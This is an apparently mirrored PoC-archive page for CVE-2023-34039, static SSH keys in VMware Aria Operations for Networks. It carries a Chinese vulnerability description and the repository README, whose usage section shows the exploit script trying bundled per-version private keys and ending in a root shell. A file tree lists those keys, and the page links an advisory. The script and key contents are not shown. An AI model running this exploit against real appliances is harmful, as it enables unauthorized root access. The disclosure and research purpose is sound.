Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-34039 PoC — VMware Aria Operations 加密问题漏洞

Source
https://github.com/syedhafiz1234/CVE-2023-34039
Associated Vulnerability
Title:VMware Aria Operations 加密问题漏洞 (CVE-2023-34039)
Description:VMware Aria Operations是美国威睿(VMware)公司的一个统一的、人工智能驱动的自动驾驶 IT 运营管理平台,适用于私有云、混合云和多云环境。 Aria Operations for Networks存在安全漏洞,该漏洞源于缺乏唯一的加密密钥生成,导致身份验证绕过, 攻击者利用该可以绕过 SSH 身份验证来访问 Aria Operations for Networks CLI。
Description
CVE-2023-34039
Readme
# CVE-2023-34039
POC for CVE-2023-34039 VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE

## Technical Analysis
A root cause analysis of the vulnerability can be found on my blog:

https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-34039/

![poc](poc.gif)


## Summary
VMWare Aria Operations for Networks (vRealize Network Insight) from version 6.0 to 6.10 did not regenerate the ssh keys for the `support` and `ubuntu` users, allowing an attacker with SSH access to gain `root` shell access to this product.

This issue was reported to VMWare by <a style="text-decoration: none" href="https://twitter.com/rootxharsh" target="_blank">Harsh Jaiswal (@rootxharsh)</a>
and <a style="text-decoration: none" href="https://twitter.com/iamnoooob" target="_blank">Rahul Maini (@iamnoooob)</a> at <a style="text-decoration: none" href="https://twitter.com/pdiscoveryio" target="_blank">ProjectDiscovery Research</a>

I just wrote the exploit, if you can call it that, cause it's basically a ssh command wrapper.

## Usage
```plaintext
python CVE-2023-34039.py --target 192.168.1.16
(!) VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039)

(*) Exploit by Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)

(*) Trying key: keys/vrni-6.2.0/id_rsa_vnera_keypair_6.2.0_collector

(*) Trying key: keys/vrni-6.2.0/id_rsa_vnera_keypair_6.2.0_platform

(*) Trying key: keys/vrni-6.10.0/id_rsa_vnera_keypair_6.10.0_platform


********************************** ATTENTION **********************************
 NTP Service is not healthy.
 IMPACT: It may affect the proper working of other services.
 ACTION: Restore the service using 'ntp' CLI command.
********************************** ATTENTION **********************************
support@vrni-platform-release:~$ sudo -i
root@vrni-platform-release:~# id
uid=0(root) gid=0(root) groups=0(root)
root@vrni-platform-release:~# hostname
vrni-platform-release
root@vrni-platform-release:~# 

```

## Mitigations
Update to the latest version or mitigate by following the instructions within the Progress Advisory
* https://www.vmware.com/security/advisories/VMSA-2023-0018.html
File Snapshot

 [4.0K]  /data/pocs/3d3fa81fff7a44cb1d4f73c2e54bd3fe2d1016e1
├── [1.6K]  CVE-2023-34039.py
├── [4.0K]  keys
│   ├── [4.0K]  vrni-6.0.0
│   │   ├── [1.6K]  id_rsa_vnera_keypair_6.0.0_platform
│   │   └── [1.6K]  id_rsa_vnera_keypair_6.0.0_proxy
│   ├── [4.0K]  vrni-6.1.0
│   │   ├── [1.6K]  id_rsa_vnera_keypair_6.1.0_platform
│   │   └── [1.6K]  id_rsa_vnera_keypair_6.1.0_proxy
│   ├── [4.0K]  vrni-6.10.0
│   │   ├── [1.6K]  id_rsa_vnera_keypair_6.10.0_collector
│   │   └── [1.6K]  id_rsa_vnera_keypair_6.10.0_platform
│   ├── [4.0K]  vrni-6.2.0
│   │   ├── [1.6K]  id_rsa_vnera_keypair_6.2.0_collector
│   │   └── [1.6K]  id_rsa_vnera_keypair_6.2.0_platform
│   ├── [4.0K]  vrni-6.3.0
│   │   ├── [1.6K]  id_rsa_vnera_keypair_6.3.0_collector
│   │   └── [1.6K]  id_rsa_vnera_keypair_6.3.0_platform
│   ├── [4.0K]  vrni-6.4.0
│   │   ├── [1.6K]  id_rsa_vnera_keypair_6.4.0_collector
│   │   └── [1.6K]  id_rsa_vnera_keypair_6.4.0_platform
│   ├── [4.0K]  vrni-6.5.0
│   │   ├── [1.6K]  id_rsa_vnera_keypair_6.5.0_collector
│   │   └── [1.6K]  id_rsa_vnera_keypair_6.5.0_platform
│   ├── [4.0K]  vrni-6.6.0
│   │   ├── [1.6K]  id_rsa_vnera_keypair_6.6.0_collector
│   │   └── [1.6K]  id_rsa_vnera_keypair_6.6.0_platform
│   ├── [4.0K]  vrni-6.7.0
│   │   ├── [1.6K]  id_rsa_vnera_keypair_6.7.0_collector
│   │   └── [1.6K]  id_rsa_vnera_keypair_6.7.0_platform
│   ├── [4.0K]  vrni-6.8.0
│   │   ├── [1.6K]  id_rsa_vnera_keypair_6.8.0_collector
│   │   └── [1.6K]  id_rsa_vnera_keypair_6.8.0_platform
│   └── [4.0K]  vrni-6.9.0
│       ├── [1.6K]  id_rsa_vnera_keypair_6.9.0_collector
│       └── [1.6K]  id_rsa_vnera_keypair_6.9.0_platform
├── [ 98K]  poc.gif
└── [2.2K]  README.md

12 directories, 25 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.